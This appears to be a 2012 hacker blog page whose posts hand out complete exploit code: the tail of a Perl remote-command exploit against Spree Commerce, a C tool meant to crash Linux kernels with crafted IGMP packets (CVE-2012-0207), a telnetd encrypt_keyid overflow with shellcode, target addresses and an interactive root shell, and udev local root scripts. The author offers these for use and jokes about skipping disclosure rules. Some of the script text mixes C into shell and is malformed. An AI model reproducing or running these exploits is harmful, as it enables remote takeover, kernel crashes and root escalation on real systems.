my $directory; #annoying strict issue ;\
my $payload = '/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. 'echo%20'
. $line
. '>>'
. $directory
. "/"
. $opt_f
. "%60end";
}
if ( $cmd_or_file =~ /commands/ ) {
my $payload = '/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. $line
. '%60end';
}
my $payload_length = length($payload);
my $host = $opt_t;
#create request
my $buffer =
'POST / HTTP/1.1' . "\n" .
'Host: $host' . "\n" .
'Keep-Alive: 300' . "\n" .
'Connection: Close' . "\n" .
'Referer: XD' . "\n" .
'Cookie: sid=1; testing=1;' . "\n" .
'Content-Type: plain/text' . "\n" .
'Length: ' . $payload_length . "\n\n" .
"$payload\n\n";
#send attack to socket
if ($cmd_or_file =~ /cmd/) {
return ($buffer);
}
if ($cmd_or_file =~ /file/) {
attack($cmd_or_file, $buffer);
}
if ($cmd_or_file =~ /commands/) {
attack($cmd_or_file, $buffer);
}
}
sub attack {
my ($cmd_or_file, $buffer) = @_;
my $host = $opt_t;
print " [+] Connecting to: $host\n ";
my $sock = IO::Socket::INET->new(
Proto    => 'tcp',
PeerAddr => $host,
PeerPort => 80,
Timeout  => 15
) or die(" [-] Unable to connect to: $host\nError : $! ");
if ($sock) {
print $sock $buffer;
print " [+] Buffer sent .. running our command .. \n ";
}
if ($cmd_or_file =~ /cmd/) {
while ( my $responce = $sock ) {
print "[!+!] Reply from: $host\n ";
print $responce;
}
exit(0);
}
}

About the exploit.. there is actually, a couple of them and, there is, this one wich can execute code nicely. on prettymuch any version i think.. am sure it might be patched now, but unsure wich versions/IS.and other bndled softwares thagt use Spree Commerce ( www.spreecommerce.com ).

We did agree, (me and peanuter that is), not to make it auto root, and, this was fine with me, and him, so, for those who CAN read, it is not hard atall to port anything for this, and, peanuter did a fine job of recioding it.. i have, another bug you could say, wich exists on the same page of code this bug is on..and since this is not a disclosure like normal ones, well hell… we dont have to follow ANY rules.

So what happened..why did it happen, so that it was NOT disclosed.. ok thats easy.. i made this bug PoC about 6 months ago, i dont know if, i was ted or what… anyhow, i used to keep ownage.pastebin.com (before they stopped subdomaining it) ,and well, thus was born the spree.pl ,in this time, a member from my efnet network channel #HaxNET , a member had tried to run and, there was one brace to many! well, shit onn me… anyhow, i fixed it up for him, but then realised, we had much more talented members than me in my channel for perkl =) Thats a no brainer.. but, i was NOT expecting it to be this guy.. hehehe, but, i welcomed peanuters sugestions, and, he was nice about things, and asked to *properly* do it..so, it went a cpl of diff versions, and, i know different attacks, were tested, on my end, for mutiiple vulnerabiliteies… anyhow, i could not figure if it was or not patched, and by this time it had sat on ownage. for about months,. and was very eay to see apparently :s

Anmyhow, that kinda, killed the chance of tryin to keep it quiet.. but, before it ended up on exploitdb or sum other silly archive site, id rather, showcase it and, the talent wich went into a small, yet, VERY nicely coded exploit. I only take credit for alittle of this now, as, it did undergo some changes, and, it has mutiple attack vectors, but, maybe you can poke around eh ? It aint so bad… only bit of php to readdd…

Anyhow, i like my friends, and, i like them to stay LOYAL ,and, i dont see this to much nowdays..I hope, by even releasing this to people, they can see that, even after *fights* with others, there can be full peace, and even a deeper understanding of the humane pshcye.

The Internet NOW,it is truly a place for geniuses, and, well, i know i am not one, but my Iq is not that of a pea , either.

hehe…anyhow, be brave and, fight the good fight!

Dont let fatassed burger eatin ppl annoy ya!~ Actually, make that, anyone… but, you know, my theme always has been, NO THUGGERY ONLINE! Still this is my belief,but, i also believe everyone has good inside them, and, this should be always looked at FIRST.

I hope, you find inner peace, just like the Dalai Lama, and then you even get to smoke weed, free! Ha! See, who said peace was bad… make a cult, get 10 wives, and shit, have a bigotting damn ghood time!’

now as for me, i have to doin-time.in , so, might not be around somuch… but, i will be sure, to look after those who looked after me when it was needed, and, for those who did NOT remain loyal..well, you should really, try and, make peace, and, stop even tencions…and, i mean this.. I mean one speail person, from Usa..and, i hope that, he can understand why i am who i am, and, thats just, a damn old man on the keys! hehe im 37, not 7, so, i dont see things as clearas, some younger people.. but damn, i see bad and good when i need to, and, i try alays to find that good nowdays, and, yea…sure it was awhile b4 i could act or be nice to anyone.. but, now, it seems normal for me to rant on like now and, feel GOOD about it, because, even if i make ONE person smile, it has made my day…

Enjoy!

XD / worldwide

comments: 0 » tags: , , ,

[DoS]: Code of ‘Undead’ attack by KCOPE But,this seems to be REMOTE not just lan based GREAT for learning about DoS ,about Icmp/Igmp/Tcp/IP,packet sequences,and how little it takes to flaw one

Posted on 18th January 2012 in Codes, Exploits

Ill just put the str8 up crappy PoC up, wich was on fdlists right ,wrong, this can attack OUTSIDE the Lan or Wlan :P
So, use some thinkin maybe update this post with your OWN version for a change
Go hard… i will have a closer look when i have more time, but, i know that my exploit for windows, is setup similar fashion and this, is simply because of the way igmp and icmp membership bugs read things, so, it had to be at the least 0.0.0.0, localhost,would fail…as thats an ip… so, i guess, goodluck!
XD

/*
** linux-undeadattack.c
** Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)
** CVE-2012-0207
** credits to Ben Hutchings:
** http://womble.decadent.org.uk/blog/igmp-denial-of-service-in-linux-cve-2012-0207.html
** THIS code wich can attack NOT just LAN, is NOT kcopes and, is based more on the ICMPv3 membership query bug... wich was for windows but also affects linux, in IMPv3 tho :P  go figure... anyhow, this can now be easily made into a very fast packet machine ,and since it doesnt care what the ips are, i guess could be seen results, remotely... feel free to update/send in comment... all comments, go thru ME, XD , before any type of publishing, so be sure that codes are safe and, i only put here, corrected codes...simple... so, please dont go adding it to your lame d0s collection coz, ill just fark it up , and, i mean, the packet is easy to block since it is released...right
XD loves u all
** Example:
** ./undeadattack SRC_IP DST_IP
** The Linux Kernel at the remote side will Panic
** when sent over the network -still in testing!
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

struct iphdr {
  unsigned char ihl:4, version:4, tos;
  unsigned short tot_len, id, frag_off;
  unsigned char ttl, protocol;
  unsigned short check;
  unsigned int saddr, daddr;
  unsigned int options1;
  unsigned int options2;
};

struct igmp_query {
        unsigned char type;
        unsigned char maxresponse;
        unsigned short csum;
        unsigned int mcast;
        char padding[40];
};

// unsigned short in_chksum(unsigned short *, int);  // removed by xd , thx for trying to cripple but no work

unsigned short in_chksum(unsigned short *addr, int len);         // this was crippled, notice that this was uptop, so you dd not see the
                                                                 // bugged up in_chksum wich wont make this works :)  NOW try it.
unsigned short in_chksum(unsigned short *addr, int len) {
   register int nleft = len;
   register int sum = 0;
   u_short answer = 0;
   while (nleft > 1) {
      sum += *addr++;
      nleft -= 2;
   }
   if (nleft == 1) {
      *(u_char *)(&answer) = *(u_char *)addr;
      sum += answer;
   }
   sum = (sum >> 16) + (sum & 0xffff);
   sum += (sum >> 16);
   answer = ~sum;
   return(answer);
}

long resolve(char *);
long resolve(char *host) {
  struct hostent *hst;
  long addr;
  hst = gethostbyname(host);
  if (hst == NULL)
    return(-1);
  memcpy(&addr, hst->h_addr, hst->h_length);
  return(addr);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dst;
  struct iphdr *ip;
  struct igmp_query *igmp;
  long daddr, saddr;
  int s, i=0, c, len, one=1;
  char buf[1500];
  if (argc < 3) {
    printf("Linux IGMP Remote Denial Of Service (Introduced in linux-2.6.36)\n"
   "credits to Ben Hutchings but this is NOT kcopes code nor firestorms so, author stays anon\n");
    printf("Usage: %s <src ip> <dst ip>\n", *argv); // yea, try any ip and see, i guess its worth a shot... or not :P
    return(1);
  }
  daddr = resolve(argv[2]);
  saddr = resolve(argv[1]);
  memset(buf, 0, 1500);
  ip = (struct iphdr *)&buf;
  igmp = (struct igmp_query*)&buf[sizeof(struct iphdr)];
  dst.sin_addr.s_addr = daddr;
  dst.sin_family = AF_INET;
  ip->ihl = 7;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = htons(sizeof(struct iphdr)+8);
  ip->id = htons(18277);
  ip->frag_off=0;
  ip->ttl = 1;
  ip->protocol = IPPROTO_IGMP;
  ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr));
  ip->saddr = saddr;
  ip->daddr = daddr;
  ip->options1 = 0;
  ip->options2 = 0;
  igmp->type = 0x11;
  igmp->maxresponse = 0xff;
  igmp->mcast=inet_addr("0.0.0.0");  // mod here ,now we can attack the IP we actually put in
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 8);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+8,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  close(s);
  s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (s == -1)
    return(1);
  ip->id = htons(18278);
  ip->tot_len = sizeof(struct iphdr)+12;
  igmp->type = 0x11;
  igmp->maxresponse = 0;
  igmp->mcast=inet_addr("0.0.0.0");
  igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero.
  igmp->csum=in_chksum((unsigned short *)igmp, 12);
  printf("Sending packet: %s -> %s\n", argv[1], argv[2]);
      if (sendto(s,&buf,sizeof(struct iphdr)+12,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) {
        perror("Error sending packet");
        exit(-1);
      }
  return(0);
}
comments: 0 » tags: ,

telnetd-encrypt_keyid.c with ~12 targets

Posted on 8th January 2012 in Exploits

The famous ‘targets’ copy i was apparently keeping from everyone… enjoy (with targets! and even addable targets!) !

/*
 *            telnetd-encrypt_keyid.c
 *  Mon Dec 26 20:37:05 CET 2011
 *  Copyright  2011  Jaime Penalba Estebanez (NighterMan)
 *  Copyright  2011  Gonzalo J. Carracedo (BatchDrake)
 *  nighterman@painsec.com - jpenalbae@gmail.com
 *  BatchDrake@painsec.com - BatchDrake@gmail.com
*/
/*
 * Usage:
 * $ gcc exploit.c -o exploit
 * $ ./exploit 127.0.0.1 23 1
 * [<] Succes reading intial server request 3 bytes
 * [>] Telnet initial encryption mode and IV sent
 * [<] Server response: 8 bytes read
 * [>] First payload to overwrite function pointer sent
 * [<] Server response: 6 bytes read
 * [>] Second payload to triger the function pointer
 * [*] got shell?
 * uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
/*
 * Most of the inetd impletantions have a connection limit per second
 * so you must chage this if you start getting errors reading responses
 *  - for 60 conex per min  900000
 *  - for 40 conex per min 1500000
 *  - for no limit 300000 should work
 */
#define BRUTE_TOUT 600000  // seems pretty fair on cpu ..
#define MAXKEYLEN 64-1

struct key_info {
  unsigned char keyid[MAXKEYLEN];
  unsigned char keylen[4];
  unsigned char dir[4];
  unsigned char modep[4];
  unsigned char getcrypt[4];
};
struct target_profile {
  uint32_t      skip;
  const char    *address;
  const char    *desc;
  const char    *shellcode;
};

/* Shellcode FreeBSD x86 */
const char s_bsd32[] =
   "\x31\xc0"                      // xor          %eax,%eax
   "\x50"                          // push         %eax
   "\xb0\x17"                      // mov          $0x17,%al
   "\x50"                          // push         %eax
   "\xcd\x80"                      // int          $0x80
   "\x50"                          // push         %eax
   "\x68\x6e\x2f\x73\x68"          // push         $0x68732f6e
   "\x68\x2f\x2f\x62\x69"          // push         $0x69622f2f
   "\x89\xe3"                      // mov          %esp,%ebx
   "\x50"                          // push         %eax
   "\x54"                          // push         %esp
   "\x53"                          // push         %ebx
   "\x50"                          // push         %eax
   "\xb0\x3b"                      // mov          $0x3b,%al
   "\xcd\x80";                     // int          $0x80

/* Shellcode Linux x86 */
const char s_linux32[] = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80";

/* Shellcode Linux sparc */
const char s_linuxsparc[] = "\x2d\x0b\xd8\x9a"  /* sethi %hi(0x2f626800), %l6 */
                            "\xac\x15\xa1\x6e"  /* or %l6, 0x16e, %l6         */
                            "\x2f\x0b\xdc\xda"  /* sethi %hi(0x2f736800), %l7 */
                            "\x90\x0b\x80\x0e"  /* and %sp, %sp, %o0          */
                            "\x92\x03\xa0\x08"  /* add %sp, 0x08, %o1         */
                            "\x94\x22\x80\x0a"  /* sub %o2, %o2, %o2          */
                            "\x9c\x03\xa0\x10"  /* add %sp, 0x10, %sp         */
                            "\xec\x3b\xbf\xf0"  /* std %l6, [ %sp + - 16 ]    */
                            "\xd0\x23\xbf\xf8"  /* st %o0, [ %sp + - 8 ]      */
                            "\xc0\x23\xbf\xfc"  /* clr [ %sp + -4 ]           */
                            "\x82\x10\x20\x3b"  /* mov 0x3b, %g1              */
                            "\x91\xd0\x20\x10"; /* ta 0x10                    */

/* Valid targets list */
struct target_profile targets[] = {
  {20, "\x00\x80\x05\x08", "Generic Linux i386 bruteforce", s_linux32},
  {20, "\x00\x80\x05\x08", "Generic BSD i386 bruteforce", s_bsd32},
  {20, "\x23\xcc\x05\x08", "Ubuntu GNU/Linux 10.04, Inetutils Server (i386)", s_linux32},
  {20, "\x12\xc9\x05\x08", "Ubuntu GNU/Linux 10.04, Heimdal Server (i386)", s_linux32},
  {20, "\xef\x56\x06\x08", "Debian GNU/Linux stable 6.0.3, Inetutils Server (i386)", s_linux32},
  {20, "\x56\x9a\x05\x08", "Debian GNU/Linux stable 6.0.3, Heimdal Server (i386)", s_linux32},
  {1,  "\x00\x03\xe7\x94", "Debian GNU/Linux stable 6.0.3 Inetutils (SPARC)", s_linuxsparc},
  {3,  "\x00\x03\x2e\x0c", "Debian GNU/Linux stable 6.0.3 Heimdal Server (SPARC)", s_linuxsparc},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.0 (i386)", s_bsd32},
  {20, "\xa6\xee\x05\x08", "FreeBSD 8.1 (i386)", s_bsd32},
  {20, "\xed\xee\x05\x08", "FreeBSD 8.2 (i386)", s_bsd32},
  {20, "\x02\xac\x05\x08", "NetBSD 5.1 (i386)", s_bsd32},
  {0, NULL, NULL, NULL}
};

/* Telnet commands */
static unsigned char tnet_init_enc[] =
        "\xff\xfa\x26\x00\x01\x01\x12\x13"
        "\x14\x15\x16\x17\x18\x19\xff\xf0";

static unsigned char tnet_option_enc_keyid[] = "\xff\xfa\x26\x07";
static unsigned char tnet_end_suboption[] = "\xff\xf0";

/* Check if the shellcode worked, slightly simpler than shell (int) */
static int checkmagic (int fd) {
  char got[32];
  if (write (fd, "echo foo\n", 9) < 0)
    return -1;
  if (read (fd, got, 32) <= 0)
    return -1;
  return -!strstr (got, "foo");
}

static void shell(int fd) {
    fd_set  fds;
    char    tmp[128];
    int n;
    /* check uid */
    write(fd, "id\n", 3);
    /* semi-interactive shell */
    for (;;) {
        FD_ZERO(&fds);
        FD_SET(fd, &fds);
        FD_SET(0, &fds);
        if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
            perror("select");
            break;
        }
        /* read from fd and write to stdout */
        if (FD_ISSET(fd, &fds)) {
            if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
                fprintf(stderr, "Goodbye..\n");
                break;
            }
            if (write(1, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
        /* read from stdin and write to fd */
        if (FD_ISSET(0, &fds)) {
            if ((n = read(0, tmp, sizeof(tmp))) < 0) {
                perror("read");
                break;
            }
            if (write(fd, tmp, n) < 0) {
                perror("write");
                break;
            }
        }
    }
}

static int open_connection(in_addr_t dip, int dport) {
   int pconn;
   struct sockaddr_in cdata;
   struct timeval timeout;
   /* timeout.tv_sec  = _opts.timeout; */
   timeout.tv_sec  = 8;
   timeout.tv_usec = 0;
   /* Set socket options and create it */
   cdata.sin_addr.s_addr = dip;
   cdata.sin_port = htons(dport);
   cdata.sin_family = AF_INET;
   pconn = socket(AF_INET, SOCK_STREAM, 0);
   if(pconn < 0) {
   printf("Socket error: %i\n", pconn);
   printf("Err message: %s\n", strerror(errno));
   return (-1);
   }
   /* Set socket timeout */
   if ( setsockopt(pconn, SOL_SOCKET, SO_RCVTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_RCVTIMEO: ");
   /* Set socket options */
   if ( setsockopt(pconn, SOL_SOCKET, SO_SNDTIMEO,(void *)&timeout, sizeof(struct timeval)) != 0)
   perror("setsockopt SO_SNDTIMEO: ");
   /* Make connection */
   if (connect(pconn,(struct sockaddr *) &cdata, sizeof(cdata)) != 0) {
   close(pconn);
   return -1;
   }
   return pconn;
}

static void usage(char *arg) {
    int x = 0;
    printf("Available Targets:\n\n");
    /* print tagets */
    while(targets[x].address != NULL) {
    printf("  %2i: %s\n", x + 1, targets[x].desc);
    x++;
    }
    printf("\n");
    printf("Telnetd encrypt_keyid exploit\n");
    printf("Usage: %s [IP] [Port] [Target]\n\n", arg);
}

int attack (const char *ip, unsigned int port,unsigned char *payload, unsigned int psize, int tryshell) {
  unsigned char readbuf[256];
  int ret;
  int conn;
  /* Open the connection */
  conn = open_connection(inet_addr(ip), port);
  if (conn == -1) {
  printf("[-] Error connecting: %i\n", errno);
  return -1;
  }
  /* Read initial server request */
  ret = read(conn, readbuf, 256);
  if (ret <= 0) {
  printf ("[!] Error receiving response: %s\n", ret ? strerror (errno) : "empty response");
  close (conn);
  return -1;
  }
  printf("[<] Success reading intial server request %i bytes ..\n", ret);
  /* printf("ATTACH DEBUGGER & PRESS KEY TO CONITNUE\n"); */
  /* ret = getchar(); */
  /* Send encryption and IV */
  ret = write(conn, tnet_init_enc, sizeof(tnet_init_enc));
  if (ret != sizeof(tnet_init_enc)) {
  printf("[-] Error sending init encryption: %i\n", ret);
  close (conn);
  return -1;
  }
  printf("[>] Telnet initial encryption mode and IV sent\n");
  /* Read response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response\n");
  close (conn);
  return -1;
  } else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the first payload with the overflow */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload first time\n");
  close (conn);
  return -1;
  }
  printf("[>] First payload to overwrite function pointer sent\n");
  /* Read Response */
  if ((ret = read(conn, readbuf, 256)) == -1 && errno == EAGAIN) {
  printf ("[!] Timeout when receiving response ..\n");
  close (conn);
  return -1;
  }
  else
  printf("[<] Server response: %i bytes read\n", ret);
  /* Send the payload again to tigger the function overwrite */
  ret = write(conn, payload, psize);
  if (ret != psize) {
  printf("[-] Error sending payload second time ..\n");
  close (conn);
  return -1;
  }
  printf("[>] Second payload to trigger the function pointer ..\n");
  if (tryshell) {
  /* Start the semi interactive shell */
  printf("[*] Got root?\n");
  shell(conn);
  ret = 0;
  } else {
  printf ("[*] Does this work? ");
  /* Just check if it works */
  if (checkmagic (conn) == 0) {
  printf ("YES!\n");
  printf ("Add the Target address to the targets list & recomple!\n");
  ret = 0;
  } else {
  printf ("[-] Nope,try again ..\n");
  ret = -1;
  }
  }
  close (conn);
  return ret;
}

int main(int argc, char *argv[]) {
      int offset = 0;
      int target;
      int i;
      unsigned int address;
      /* Payload Size */
      int psize = (sizeof(struct key_info) +
      sizeof(tnet_option_enc_keyid) +
      sizeof(tnet_end_suboption));
      struct key_info bad_struct;
      unsigned char payload[psize];
      if (argc != 4) {
      usage(argv[0]);
      return -1;
      }
      /* Fill the structure */
      memset(&bad_struct, 0x90, sizeof(struct key_info));
      memcpy(bad_struct.keylen,   "DEAD", 4);
      memcpy(bad_struct.dir,      "BEEF", 4);
      target = atoi(argv[3]) - 1;
      /* Target selection */
      struct target_profile *t;
      t = &targets[target];
      printf("Target: %s\n\n", t->desc);
      for (i = 0; !i || target < 2; i++) {
      offset = 0;
      memcpy(&bad_struct.keyid[t->skip], t->shellcode, strlen(t->shellcode));
      memcpy (&address, t->address, 4);
      address += ((i + 1) >> 1) * (t->skip - 1) * (1 - ((i & 1) << 1));
      printf ("[*] Target address: 0x%04x\n", address);
      memcpy(bad_struct.modep, &address, 4); /* Readable address */
      memcpy(bad_struct.getcrypt, &address, 4); /* Function pointer */
      /* Prepare the payload with the overflow */
      memcpy(payload, tnet_option_enc_keyid, sizeof(tnet_option_enc_keyid));
      offset += sizeof(tnet_option_enc_keyid);
      memcpy(&payload[offset], &bad_struct, sizeof(bad_struct));
      offset += sizeof(bad_struct);
      memcpy(&payload[offset], tnet_end_suboption, sizeof(tnet_end_suboption));
      if (attack (argv[1], atoi (argv[2]), payload, psize, target >= 2) == 0)
      break;
      usleep (BRUTE_TOUT);
    }
    return 0;
}

ENJOY! The ‘pvt’ socalled version ;)
XD

comments: 0 » tags: , ,

UDEV KERNEL EVENT Local priv escalations By Kcope and By UNKNOWN

Posted on 8th January 2012 in Exploits

UDEV Kcope bversion and the Undergroun bash version , have phunnnnnnn
XD / #HAXNET

#!/bin/sh
# Linux 2.6 Udev expl
# bug found by Sebastian Krahmer
# coded by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0

int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;

main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];
sprintf(event, "add");
sprintf(subsystem, "block");
sprintf(sysfspath, "/dev/foo");
sprintf(major, "8");
sprintf(minor, "1");
memset(&address, 0, sizeof(address));
address.nl_family = AF_NETLINK;
address.nl_pid = atoi(argv[1]);
address.nl_groups = 0;
msg.msg_name = (void*)&address;
msg.msg_namelen = sizeof(address);
msg.msg_iov = &iovector;
msg.msg_iovlen = 1;
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
char message[LONG_STRING];
char *mp;
mp = message;
mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
mp += sprintf(mp, "ACTION=%s", event) +1;
mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
mp += sprintf(mp, "MAJOR=%s", major) +1;
mp += sprintf(mp, "MINOR=%s", minor) +1;
mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
mp += sprintf(mp, "REMOVE_CMD=/bin/bash -i") +1;
iovector.iov_base = (void*)message;
iovector.iov_len = (int)(mp-message);
char *buf;
int buflen;
buf = (char *) &msg;
buflen = (int)(mp-message);
sendmsg(socket_fd, &msg, 0);
close(socket_fd);
sleep(10);
execl("/tmp/acc", "acc", (void*)0);
}

gcc ud.c -o /tmp/ud
cat > prog.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
setgid(0);
setuid(0);
unsetenv("LD_PRELOAD");
execl("/bin/sh","sh","-c","/tmp/acc",NULL);
}
gcc -o prog.o -c prog.c -fPIC
gcc -shared -Wl,-soname,slib_ex.so.1 -o slib_ex.so.1.0 prog.o -nostartfiles

int main(void) {
setgid(0);
setuid(0);
execl("/bin/sh","/bin/sh",0);
}
gcc -o /tmp/acc acc.c
cp slib_ex.so.1.0 /tmp/slib_ex.so.1.0
/tmp/ud $1

And for the best version of all…

#!/bin/sh
# ubuntu 10.04 , 10.10 udev local root
if [ -z "$1" ]
then
echo "Usage: $0 <UDEV KERNEL EVENT>"
echo "See http://www.reactivated.net/writing_udev_rules.html"
exit
fi
cat > usn.sh << EOF
#!/bin/sh
chown root:root $PWD/usn
chmod +s $PWD/usn
EOF
cat > usn.c << EOF
char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
main(){
int *r;
*((int *)&r+2)=(int)s;
}
EOF
gcc usn.c -o usn
echo "KERNEL==\"$1\", RUN+=\"$PWD/usn.sh\"" >> /dev/.udev/rules.d/root.rules
chmod +x usn.sh
echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat)"
echo "Once the conf is reloaded, just make the udev event happen : usn file will get suid-root"

Thats the Underground one wich is nice and neat,fast and furiouz :>
Enjoy them all, old now anyhow..
XD

comments: 7 » tags: ,
« Previous